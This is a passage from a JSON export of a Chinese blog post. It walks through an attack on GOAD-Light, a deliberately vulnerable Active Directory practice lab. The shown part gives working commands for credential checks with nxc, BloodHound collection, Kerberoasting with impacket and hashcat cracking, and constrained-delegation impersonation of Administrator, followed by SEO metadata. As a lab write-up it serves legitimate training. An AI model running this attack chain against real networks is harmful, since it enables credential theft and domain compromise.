class=\"wp-block-heading\"><a><\/a><strong>\u7236\u57df\u51ed\u636e\u843d\u5730\u4e0e BloodHound<\/strong><strong><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\u610f\u7236\u57df\u91cc\u6709\u4e24\u4e2a\u7b26\u5408 secret.ps1 \u4e2d #T.L. \u7ebf\u7d22\u7684\u5019\u9009\u7528\u6237\uff1atywin.lannister \u548c tyron.lannister\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u4e24\u4e2a\u90fd\u8bd5\u4e00\u6b21<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 \\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;-d sevenkingdoms.local \\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;-u &#8216;tywin.lannister&#8217; -p &#8216;powerkingftw135&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 \\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;-d sevenkingdoms.local \\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;-u &#8216;tyron.lannister&#8217; -p &#8216;powerkingftw135&#8217;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-93.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"497\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-93.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2150\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>tywin.lannister\u53ef\u4ee5\u800c\u4e1410.11.22\u90fd\u53ef\u4ee5\u767b\u5f55<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5148\u628a sevenkingdoms.local \u8fd9\u4efd zip \u5bfc\u8fdb BloodHound Legacy\uff0c\u7136\u540e\u91cd\u70b9\u770b\u8fd9\u51e0\u4e2a\u67e5\u8be2\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>bloodhound-python \\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;-u &#8216;jeor.mormont&#8217; -p &#8216;_L0ngCl@w_&#8217; \\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;-d &#8216;north.sevenkingdoms.local&#8217; -ns 192.168.56.11 \\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;-c All &#8211;zip<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-94.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"443\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-94.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2151\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\"><a><\/a><strong>Kerberoasting \u4e0e\u59d4\u6d3e\u5229\u7528<\/strong><strong><\/strong><\/h1>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Kerberoasting<\/strong><strong><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u7528\u5df2\u62ff\u5230\u7684\u57df\u8d26\u53f7\u5411\u57df\u63a7\u679a\u4e3e\u5e26 SPN \u7684\u670d\u52a1\u8d26\u53f7\uff0c\u5e76\u628a\u5b83\u4eec\u7684 Kerberos \u670d\u52a1\u7968\u636e\u6293\u4e0b\u6765\uff0c\u4f9b\u540e\u7eed\u79bb\u7ebf\u7834\u89e3\u5bc6\u7801\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>impacket-GetUserSPNs sevenkingdoms.local\/tywin.lannister:powerkingftw135 \\ -dc-ip 192.168.56.10 -request \u5b50\u57df\u8fd9\u6761\u4e5f\u662f\u4e00\u6837\uff1a impacket-GetUserSPNs<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>north.sevenkingdoms.local\/jeor.mormont:_L0ngCl@w_ \\ -dc-ip 192.168.56.11 -request<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-95.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"515\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-95.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2152\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u7236\u57df\u6ca1\u6709\u53ef\u7528\u7684SPN\u8d26\u53f7\uff0c\u5b50\u57df\u6293\u5230\u4e86sansa.stark\u3001jon.snow\u3001sql_svc\uff0c\u5e76\u8f93\u51fa\u4e09\u6bb5hash<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>sql_svc \u7684\u5bc6\u7801\u5df2\u7ecf\u77e5\u9053\u4e86\uff0c\u4e0d\u7528\u518d crack\uff1b\u628a sansa.stark \u548c jon.snow \u90a3\u4e24\u6761 $krb5tgs$23$&#8230; \u54c8\u5e0c\u4fdd\u5b58\u5230\u4e00\u4e2a\u6587\u4ef6\u91cc\uff0c\u518d\u7528 hashcat \u8dd1\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>hashcat -m 13100 hashpatch.txt \/usr\/share\/wordlists\/rockyou.txt<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-96.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"528\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-96.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2153\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u6700\u7ec8\u7206\u7834\u51fa jon.snow \u7684\u5bc6\u7801\u662f iknownothing\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-97.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"228\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-97.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2154\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><a><\/a><strong>\u59d4\u6d3e\u5229\u7528\u4e0e\u9636\u6bb5\u7ed3\u8bba<\/strong><strong><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u7528\u65b0\u8d26\u5bc6\u9a8c\u8bc1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>impacket-findDelegation north.sevenkingdoms.local\/jon.snow:iknownothing \\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;-dc-ip 192.168.56.11\u67e5\u770bjon.snow\u662f\u5426\u88ab\u5141\u8bb8\u201c\u4ee3\u66ff\u522b\u4eba\u201d\u8bbf\u95ee\u54ea\u4e9b\u670d\u52a1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>impacket-getST -spn cifs\/winterfell.north.sevenkingdoms.local \\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;-impersonate Administrator \\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;north.sevenkingdoms.local\/jon.snow:iknownothing \\<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;-dc-ip 192.168.56.11<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-98.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"395\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-98.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2155\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>jon.snow \u6709 Constrained w\/ Protocol Transition<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5b83\u88ab\u5141\u8bb8\u59d4\u6d3e\u5230 CIFS\/winterfell.north.sevenkingdoms.local<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5728\u7b2c\u4e8c\u53e5\u7684getST<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8fd9\u8bf4\u660e\u6211\u4eec\u5df2\u7ecf\u6210\u529f\u4f2a\u9020\u51fa Administrator \u8bbf\u95ee CIFS\/winterfell.north.sevenkingdoms.local \u7684\u670d\u52a1\u7968\u636e\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u66f4\u51c6\u786e\u5730\u8bf4\uff0c\u8fd9\u4e00\u6b65\u5df2\u7ecf\u8bc1\u660e\u4e86 north.sevenkingdoms.local \u5b50\u57df\u4e2d\u7684\u9ad8\u6743\u9650\u8def\u5f84\u88ab\u6253\u901a\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5b98\u65b9\u6ca1\u6709\u660e\u786e\u8bf4\u660e\u8fd9\u4e00\u6b65\u5df2\u7ecf\u7b49\u4e8e\u7236\u57df\u63a7\u5236\u6216\u6574\u7247\u6797\u63a7\u5236\uff0c\u6240\u4ee5\u8fd9\u7bc7 GOAD-Light \u590d\u73b0\u5148\u6536\u5728\u8fd9\u91cc\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>GOAD-Light \u8fd9\u662f\u4e0d\u5305\u542b essos \u57df\u7684\u8f7b\u91cf\u7ea7 goad \u7248\u672c\u3002\u6b64\u5b9e\u9a8c\u73af\u5883\u4e13\u4e3a\u6027\u80fd\u8f83\u4f4e\u7684\u8ba1\u7b97\u673a\uff08\u6700\u5c0f [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2157,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-2132","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-writings"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>GOAD-Light - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"GOAD-Light - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c\" \/>\n<meta property=\"og:description\" content=\"GOAD-Light \u8fd9\u662f\u4e0d\u5305\u542b essos \u57df\u7684\u8f7b\u91cf\u7ea7 goad \u7248\u672c\u3002\u6b64\u5b9e\u9a8c\u73af\u5883\u4e13\u4e3a\u6027\u80fd\u8f83\u4f4e\u7684\u8ba1\u7b97\u673a\uff08\u6700\u5c0f [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/\" \/>\n<meta property=\"og:site_name\" content=\"\u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-31T12:38:50+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-05-31T12:39:47+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/\u5fae\u4fe1\u56fe\u7247_20260531202317_626_18-1024x724.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"724\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Speeder\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/77992108_p0-1-scaled.jpg\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"Speeder\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"19 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/31\\\/goad-light\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/31\\\/goad-light\\\/\"},\"author\":{\"name\":\"Speeder\",\"@id\":\"https:\\\/\\\/koishi.team\\\/#\\\/schema\\\/person\\\/61a09d37ac9078d28245c5e1502a58c3\"},\"headline\":\"GOAD-Light\",\"datePublished\":\"2026-05-31T12:38:50+00:00\",\"dateModified\":\"2026-05-31T12:39:47+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/31\\\/goad-light\\\/\"},\"wordCount\":3007,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/#\\\/schema\\\/person\\\/61a09d37ac9078d28245c5e1502a58c3\"},\"image\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/31\\\/goad-light\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2026\\\/05\\\/\u5fae\u4fe1\u56fe\u7247_20260531202317_626_18.png\",\"articleSection\":[\"\u6587\u7ae0\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/31\\\/goad-light\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/31\\\/goad-light\\\/\",\"url\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/31\\\/goad-light\\\/\",\"name\":\"GOAD-Light - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/31\\\/goad-light\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/31\\\/goad-light\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2026\\\/05\\\/\u5fae\u4fe1\u56fe\u7247_20260531202317_626_18.png\",\"datePublished\":\"2026-05-31T12:38:50+00:00\",\"dateModified\":\"2026-05-31T12:39:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/31\\\/goad-light\\\/#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/31\\\/goad-light\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/31\\\/goad-light\\\/#primaryimage\",\"url\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2026\\\/05\\\/\u5fae\u4fe1\u56fe\u7247_20260531202317_626_18.png\",\"contentUrl\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2026\\\/05\\\/\u5fae\u4fe1\u56fe\u7247_20260531202317_626_18.png\",\"width\":1952,\"height\":1380},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/31\\\/goad-light\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/koishi.team\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"GOAD-Light\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/koishi.team\\\/#website\",\"url\":\"https:\\\/\\\/koishi.team\\\/\",\"name\":\"\u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c\",\"description\":\"\u300cSubterranean Rose\u300d\",\"publisher\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/#\\\/schema\\\/person\\\/61a09d37ac9078d28245c5e1502a58c3\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/koishi.team\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-Hans\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/koishi.team\\\/#\\\/schema\\\/person\\\/61a09d37ac9078d28245c5e1502a58c3\",\"name\":\"Speeder\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/75732553_p0-150x150.jpg\",\"url\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/75732553_p0-150x150.jpg\",\"contentUrl\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/75732553_p0-150x150.jpg\",\"caption\":\"Speeder\"},\"logo\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/75732553_p0-150x150.jpg\"},\"sameAs\":[\"https:\\\/\\\/koishi.team\"],\"url\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/author\\\/speeder\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"GOAD-Light - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/","og_locale":"zh_CN","og_type":"article","og_title":"GOAD-Light - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","og_description":"GOAD-Light \u8fd9\u662f\u4e0d\u5305\u542b essos \u57df\u7684\u8f7b\u91cf\u7ea7 goad \u7248\u672c\u3002\u6b64\u5b9e\u9a8c\u73af\u5883\u4e13\u4e3a\u6027\u80fd\u8f83\u4f4e\u7684\u8ba1\u7b97\u673a\uff08\u6700\u5c0f [&hellip;]","og_url":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/","og_site_name":"\u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","article_published_time":"2026-05-31T12:38:50+00:00","article_modified_time":"2026-05-31T12:39:47+00:00","og_image":[{"width":1024,"height":724,"url":"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/\u5fae\u4fe1\u56fe\u7247_20260531202317_626_18-1024x724.png","type":"image\/png"}],"author":"Speeder","twitter_card":"summary_large_image","twitter_image":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/77992108_p0-1-scaled.jpg","twitter_misc":{"\u4f5c\u8005":"Speeder","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"19 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/#article","isPartOf":{"@id":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/"},"author":{"name":"Speeder","@id":"https:\/\/koishi.team\/#\/schema\/person\/61a09d37ac9078d28245c5e1502a58c3"},"headline":"GOAD-Light","datePublished":"2026-05-31T12:38:50+00:00","dateModified":"2026-05-31T12:39:47+00:00","mainEntityOfPage":{"@id":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/"},"wordCount":3007,"commentCount":0,"publisher":{"@id":"https:\/\/koishi.team\/#\/schema\/person\/61a09d37ac9078d28245c5e1502a58c3"},"image":{"@id":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/#primaryimage"},"thumbnailUrl":"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/\u5fae\u4fe1\u56fe\u7247_20260531202317_626_18.png","articleSection":["\u6587\u7ae0"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/","url":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/","name":"GOAD-Light - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","isPartOf":{"@id":"https:\/\/koishi.team\/#website"},"primaryImageOfPage":{"@id":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/#primaryimage"},"image":{"@id":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/#primaryimage"},"thumbnailUrl":"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/\u5fae\u4fe1\u56fe\u7247_20260531202317_626_18.png","datePublished":"2026-05-31T12:38:50+00:00","dateModified":"2026-05-31T12:39:47+00:00","breadcrumb":{"@id":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/"]}]},{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/#primaryimage","url":"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/\u5fae\u4fe1\u56fe\u7247_20260531202317_626_18.png","contentUrl":"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/\u5fae\u4fe1\u56fe\u7247_20260531202317_626_18.png","width":1952,"height":1380},{"@type":"BreadcrumbList","@id":"https:\/\/koishi.team\/index.php\/2026\/05\/31\/goad-light\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/koishi.team\/"},{"@type":"ListItem","position":2,"name":"GOAD-Light"}]},{"@type":"WebSite","@id":"https:\/\/koishi.team\/#website","url":"https:\/\/koishi.team\/","name":"\u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","description":"\u300cSubterranean Rose\u300d","publisher":{"@id":"https:\/\/koishi.team\/#\/schema\/person\/61a09d37ac9078d28245c5e1502a58c3"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/koishi.team\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-Hans"},{"@type":["Person","Organization"],"@id":"https:\/\/koishi.team\/#\/schema\/person\/61a09d37ac9078d28245c5e1502a58c3","name":"Speeder","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/75732553_p0-150x150.jpg","url":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/75732553_p0-150x150.jpg","contentUrl":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/75732553_p0-150x150.jpg","caption":"Speeder"},"logo":{"@id":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/75732553_p0-150x150.jpg"},"sameAs":["https:\/\/koishi.team"],"url":"https:\/\/koishi.team\/index.php\/author\/speeder\/"}]}},"_links":{"self":[{"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/posts\/2132","targetHints":{"allow":["GET"]}}],"collection"